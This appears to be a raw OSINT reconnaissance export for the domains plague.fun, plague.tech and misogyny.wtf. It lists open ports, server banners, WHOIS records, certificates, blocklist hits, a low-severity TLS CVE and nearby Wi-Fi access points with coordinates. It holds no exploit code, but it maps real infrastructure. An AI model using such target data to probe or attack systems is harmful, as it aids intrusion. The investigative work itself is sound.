2022-12-18 00:20:59 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77b2699f7f992d88-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 2606:4700:3033::6815:1cf0
2022-12-18 00:12:39 Physical Location No ipapi.co 1 0 2 0 None Bergamo, Lombardy, 25, Italy, IT 81.88.52.232
2022-12-18 00:21:06 Open TCP Port No Censys 0 0 2 0 None 172.67.147.230:2096 172.67.147.230
2022-12-18 00:09:55 Hosting Provider No Hosting Provider Identifier 0 0 2 0 None Cloudflare Inc: https://www.cloudflare.com/
172.67.169.215
2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None S-lan (Net ID: 00:01:24:F1:91:41) 37.780462,-122.390564
2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None (Net ID: 00:01:E6:93:CF:EC) 37.7803446,-122.3906132
2022-12-18 00:09:39 Open TCP Port No LeakIX 0 0 2 0 None 188.114.97.9:80 188.114.97.9
2022-12-18 00:32:18 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@west.cn Domain Name: PLAGUE.TECH Registry Domain ID: D183124424-CNIC Registrar WHOIS Server: whois.west.cn Registrar URL: http://www.west.cn Updated Date: 2022-06-14T09:03:38.0Z Creation Date: 2020-04-17T02:15:35.0Z Registry Expiry Date: 2023-04-17T23:59:59.0Z Registrar: CHENGDU WEST DIMENSION DIGITAL TECHNOLOGY CO., LTD. Registrar IANA ID: 1556 Domain Status: ok https://icann.org/epp#ok Registrant Organization: Wei Cao Registrant State/Province: Jiang Su Registrant Country: CN Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: NS4.MYHOSTADMIN.NET Name Server: NS5.MYHOSTADMIN.NET DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@west.cn Registrar Abuse Contact Phone: +86.2862778877 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:32:15.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. 
Domain Name: plague.tech Registry Domain ID: zd33450047986564 Registrar WHOIS Server: whois.west.cn Registrar URL: www.west.cn Updated Date: 2020-04-17T02:15:35.0Z Creation Date: 2020-04-17T02:15:35.0Z Registrar Registration Expiration Date: 2023-04-17T23:59:59.0Z Registrar: Chengdu west dimension digital technology Co., LTD Registrar IANA ID: 1556 Reseller: Domain Status: ok http://www.icann.org/epp#ok Registry Registrant ID: Not Available From Registry Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Jiang Su Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: CN Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: Registrant Email: link at https://www.west.cn/web/whoisform?domain=plague.tech Registry Admin ID: Not Available From Registry Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: Admin Email: link at https://www.west.cn/web/whoisform?domain=plague.tech Registry Tech ID: Not Available From Registry Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: Tech Email: link at https://www.west.cn/web/whoisform?domain=plague.tech Name Server: ns4.myhostadmin.net Name Server: ns5.myhostadmin.net DNSSEC: signedDelegation Registrar Abuse Contact Email: 
westabuse@gmail.com Registrar Abuse Contact Phone: +86.2862778877 URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:32:15.0Z <<< For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
2022-12-18 00:21:30 Netblock Membership No Censys 0 0 2 0 None 172.67.176.0/20 172.67.190.129
2022-12-18 00:04:11 SSL Certificate - Issued to No SSL Certificate Analyzer 1 0 2 0 None C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com 188.114.97.0
2022-12-18 00:11:48 Malicious Affiliate IP Address Yes Greensnow 0 1 3 0 None greensnow.co [81.88.52.223] https://blocklist.greensnow.co/greensnow.txt 81.88.52.223
2022-12-18 00:05:30 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [Hybrid Analysis JSON search result for host 34.149.204.188 (count 50) omitted] 34.149.204.188
2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None usernamervali.bancoesername.repl.co 34.149.204.188
2022-12-18 00:04:28 Affiliate - Internet Name - Unresolved No DNS Raw Records 0 0 1 0 None spf.efwd.registrar-servers.com misogyny.wtf
2022-12-18 00:03:36 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None stream.plague.fun [raw X.509 certificate omitted: Issuer: C=US, O=Let's Encrypt, CN=R3; Subject: CN=stream.plague.fun; Not Before: Jun 25 00:45:18 2022 GMT; Not After: Sep 23 00:45:17 2022 GMT; Subject Alternative Name: DNS:stream.plague.fun; CT Precertificate Poison: critical]
2022-12-18 00:05:58 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None www.plague.fun [raw X.509 certificate omitted: Issuer: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3; Subject: CN=www.plague.fun; Not Before: Oct 26 15:30:18 2020 GMT; Not After: Jan 24 15:30:18 2021 GMT; Subject Alternative Name: DNS:plague.fun, DNS:www.plague.fun]
2022-12-18 00:21:27 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77b25f649e501417-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 2606:4700:3037::6815:13f3
2022-12-18 01:00:21 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.87] https://www.virustotal.com/en/ip-address/188.114.96.87/information/ 188.114.96.0/24
2022-12-18 00:12:08 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [Hybrid Analysis JSON search result for host 188.114.96.3 (count 6) omitted] 188.114.96.3
2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None SurfandSip Wavelan (Net ID:
00:02:2D:01:79:94) 37.780462,-122.390564
2022-12-18 00:32:21 Open TCP Port No Pulsedive 0 0 4 0 None 195.110.124.148:443 195.110.124.0/24
2022-12-18 00:09:50 Vulnerability - CVE Low Yes Tool - testssl.sh 0 1 2 0 None CVE-2013-0169 https://nvd.nist.gov/vuln/detail/CVE-2013-0169 Score: 2.6 Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. Per http://www.openssl.org/news/vulnerabilities.html: Fixed in OpenSSL 1.0.1d (Affected 1.0.1c, 1.0.1b, 1.0.1a, 1.0.1) Fixed in OpenSSL 1.0.0k (Affected 1.0.0j, 1.0.0i, 1.0.0g, 1.0.0f, 1.0.0e, 1.0.0d, 1.0.0c, 1.0.0b, 1.0.0a, 1.0.0) Fixed in OpenSSL 0.9.8y (Affected 0.9.8x, 0.9.8w, 0.9.8v, 0.9.8u, 0.9.8t, 0.9.8s, 0.9.8r, 0.9.8q, 0.9.8p, 0.9.8o, 0.9.8n, 0.9.8m, 0.9.8l, 0.9.8k, 0.9.8j, 0.9.8i, 0.9.8h, 0.9.8g, 0.9.8f, 0.9.8d, 0.9.8c, 0.9.8b, 0.9.8a, 0.9.8) Affected users should upgrade to OpenSSL 1.0.1e, 1.0.0k or 0.9.8y (The fix in 1.0.1d wasn't complete, so please use 1.0.1e or later) 188.114.96.0
2022-12-18 00:07:06 Web Content Type No Web Spider 0 0 2 0 None text/html; charset=UTF-8 http://misogyny.wtf:2020/copy
2022-12-18 00:18:26 IP Address No DNS Resolver 19 0 2 0 None 81.88.48.101 mail.zerotwo-best-waifu.online
2022-12-18 00:02:50 IPv6 Address No Mnemonic PassiveDNS 13 0 1 0 None 2a06:98c1:3121::1 misogyny.wtf
2022-12-18 00:10:03 Linked URL - Internal No URLScan.io 1 0 1 0 None http://obf.plague.fun plague.fun
2022-12-18 00:03:04 IP Address No DNS Resolver 0 0 1 0 None 20.226.83.185 misogyny.wtf
2022-12-18 00:21:02 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server":
"DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 104.21.28.240
2022-12-18 00:08:30 IP Address No LeakIX 24 0 1 0 None 188.114.97.9 plague.fun
2022-12-18 00:23:00 Co-Hosted Site - Domain Name No SSL Certificate Analyzer 0 0 3 0 None amen.fr 81.88.48.102
2022-12-18 00:21:06 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77b092268ebf83d1-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 172.67.147.230
2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNet24CE (Net ID: 00:01:36:59:24:CC) 37.780462,-122.390564
2022-12-18 00:20:59 Open TCP Port No Censys 0 0 2 0 None 2606:4700:3033::6815:1cf0:443 2606:4700:3033::6815:1cf0
2022-12-18 00:03:08 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None www.plague.fun [{u'not_after': u'2023-02-02T13:11:40', u'not_before': u'2022-11-04T13:11:41', u'issuer_ca_id': 183267, u'name_value': u'atlas.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'atlas.plague.fun', u'serial_number': u'03f84007a92a29fa95e25feaf2e97579578e', u'entry_timestamp': u'2022-11-04T14:11:41.749', u'id': 7901805042}, {u'not_after': u'2023-02-02T13:11:40', u'not_before': u'2022-11-04T13:11:41',
u'serial_number': u'035f2bc4e252acba5b55252b3c57780c6b4f', u'entry_timestamp': u'2022-04-09T17:42:21.739', u'id': 6510705589}, {u'not_after': u'2022-06-06T17:41:56', u'not_before': u'2022-03-08T17:41:57', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'0454d1cf73f406da6736311b041911b70221', u'entry_timestamp': u'2022-03-08T18:41:58.165', u'id': 6305472947}, {u'not_after': u'2022-06-06T17:41:56', u'not_before': u'2022-03-08T17:41:57', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'0454d1cf73f406da6736311b041911b70221', u'entry_timestamp': u'2022-03-08T18:41:57.451', u'id': 6305474316}, {u'not_after': u'2022-06-06T17:39:26', u'not_before': u'2022-03-08T17:39:27', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'0443e4fc51db2142a626a1af57d77c1f09d4', u'entry_timestamp': u'2022-03-08T18:39:28.385', u'id': 6305464280}, {u'not_after': u'2022-06-06T17:39:26', u'not_before': u'2022-03-08T17:39:27', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'0443e4fc51db2142a626a1af57d77c1f09d4', u'entry_timestamp': u'2022-03-08T18:39:27.978', u'id': 6305463915}, {u'not_after': u'2022-04-08T17:50:29', u'not_before': u'2022-01-08T17:50:30', u'issuer_ca_id': 183267, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.plague.fun', u'serial_number': u'045042ff9a7a0aecdb51557918dd8fed52b0', u'entry_timestamp': u'2022-01 2022-12-18 00:09:34 Co-Hosted Site No HackerTarget 0 0 2 0 None eventmobilelegend22.cf 104.21.28.240 2022-12-18 00:18:04 Open TCP 
Port No Pulsedive 0 0 3 0 None 188.114.97.0:8080 188.114.97.0/24 2022-12-18 00:21:06 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77ad9c563fea22f3-ORD Content-Encoding: gzip 172.67.147.230 2022-12-18 00:21:30 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77b111e70f46faf6-DUS"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 172.67.190.129 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None role.davimoore.repl.co 34.149.204.188 2022-12-18 00:03:29 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lhcp3224.webapps.net 81.88.52.224 2022-12-18 00:22:04 Open TCP Port No Censys 0 0 2 0 None 90.116.166.104:50997 90.116.166.104 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None pancakes (Net ID: 00:00:48:67:6D:D1) 37.780462,-122.390564 2022-12-18 00:19:07 Country No Country Name Extractor 0 0 4 0 None Italy Florence, Tuscany, 52, Italy, IT 2022-12-18 00:21:13 Open TCP Port No Censys 0 0 2 0 None 188.114.97.0:2083 188.114.97.0 2022-12-18 00:12:19 Phone Number No Phone Number 
Extractor 0 0 2 0 None +3544212434 Domain Name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://www.namecheap.com/ Updated Date: 2022-10-26T19:30:44Z Creation Date: 2022-07-23T21:21:45Z Registry Expiry Date: 2023-07-23T21:21:45Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. 
Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. 
Domain name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 0001-01-01T00:00:00.00Z Creation Date: 2022-07-23T21:21:45.57Z Registrar Registration Expiration Date: 2023-07-23T21:21:45.57Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ 
>>> Last update of WHOIS database: 2022-12-17T18:02:52.31Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:12:00 Raw Data from RIRs No ipapi.co 0 0 1 0 None {u'region_code': u'ZH', u'country_tld': u'.ch', u'ip': u'51.103.210.236', u'currency_name': u'Franc', u'currency': u'CHF', u'country_population': 8516543, u'country_code': u'CH', u'timezone': u'Europe/Zurich', u'city': u'Zurich', u'network': u'51.103.208.0/20', u'languages': u'de-CH,fr-CH,it-CH,rm', u'version': u'IPv4', u'latitude': 47.3682, u'in_eu': False, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'Switzerland', u'country_capital': u'Bern', u'org': u'MICROSOFT-CORP-MSN-AS-BLOCK', u'postal': u'8070', u'asn': u'AS8075', u'country': u'CH', u'region': u'Zurich', u'longitude': 8.5671, u'country_calling_code': u'+41', u'country_area': 41290.0, u'country_code_iso3': u'CHE'} 51.103.210.236 2022-12-18 00:16:27 Co-Hosted Site No SSL Certificate Analyzer 0 0 2 0 None cdnjs.cloudflare.com 188.114.97.3 2022-12-18 00:21:13 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77b3973358a52b45-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.97.0 2022-12-18 00:09:39 Co-Hosted Site No HackerTarget 0 0 2 0 None 66793246.com 172.67.147.230 2022-12-18 00:21:09 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: 
Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77a8befc7cae86aa-ORD Content-Encoding: gzip 188.114.96.0 2022-12-18 00:03:25 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None www.plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 03:e2:2d:48:dd:4c:ac:71:43:1c:ff:e5:61:16:60:4c:1f:a4 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3 Validity Not Before: Oct 26 15:30:18 2020 GMT Not After : Jan 24 15:30:18 2021 GMT Subject: CN=www.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:eb:43:89:5d:2a:2b:fb:94:8a:04:2c:02:af:2a: 96:5b:3f:07:89:51:76:35:bf:db:b4:27:c7:db:3b: 22:5b:13:e2:bb:1a:ef:bd:f3:63:62:e1:9a:41:57: c7:e1:64:a6:3c:fb:73:f3:7e:8b:92:8b:36:7d:f5: 90:ef:19:3e:2a:70:e3:b1:1d:a8:a5:10:14:d9:44: 1e:e2:d1:86:fe:ed:a0:95:8f:1e:1f:b8:a0:64:8a: 03:2e:24:de:da:18:02:31:72:4c:bc:08:b8:b9:7d: 37:68:59:71:ff:34:47:3a:f5:31:0a:7b:e3:d7:a4: 57:9a:28:af:cb:cb:02:23:42:43:84:37:4b:43:a3: 7c:16:14:5c:c2:31:5d:41:8d:54:c0:19:2e:fc:1a: 1e:00:56:d0:6f:f0:7b:c7:06:ee:1d:32:f2:21:a6: 9b:2e:bf:1e:72:64:69:22:a6:bd:c9:5c:55:eb:28: 7f:90:ac:ce:a3:a0:3c:70:26:56:e2:ce:7e:0a:78: 11:31:a1:34:1f:1e:da:ce:6d:10:0d:02:88:dc:c0: 6a:29:a9:37:1f:9f:89:b4:a9:22:a8:7c:2d:4a:8f: a5:88:bf:b8:15:de:16:82:69:48:6c:4a:f5:1e:ac: 25:5f:c9:ac:67:4a:56:29:88:80:5a:e0:c0:f1:e2: 75:07 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 
